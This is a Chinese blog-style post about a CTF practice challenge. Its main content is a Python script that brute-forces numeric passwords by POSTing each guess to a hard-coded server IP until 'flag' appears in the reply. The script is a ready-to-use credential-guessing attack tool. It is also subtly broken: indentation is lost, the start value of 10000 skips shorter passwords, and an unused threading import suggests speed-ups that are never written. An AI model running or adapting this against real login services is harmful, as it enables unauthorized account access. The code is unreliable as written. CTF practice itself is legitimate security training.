前言
最近在进行靶场练习的时候发现一个密码爆破的题目,我在尝试使用burp解决的时候发现burp跑了半个小时的密码才跑到了300多个,联想到之前使用burp跑字典的效率之慢,我决定还是自己做一个纯数字的密码爆破工具来使用,起码跑的速度要快很多吧。
代码部分:
import urllib
import requests
import time
import threading
#from bs4 import BeautifulSoup
# 1.密码生成
print("请输入纯数字密码位数:")
input_len = input()
min_num = 10000
max_num = '9' * (int(input_len))
passwords_list = []
for i in range(min_num,int(max_num)+1):
if len(str(i)) < int(input_len):
i = '0' * (int(input_len)-len(str(i)))+str(i)
passwords_list.append(i)
print("密码生成完毕!")
# 2.将生成的密码带入进行测试
for password in passwords_list:
test = requests.post('http://114.67.246.176:19294/',data={'pwd': password})
print('当前测试的密码为:')
print(password)
#time.sleep(0.5) #此处的延时可加可不加
if 'flag' in test.text:
print('正确的密码为:')
print(password)
break
print('执行完毕!')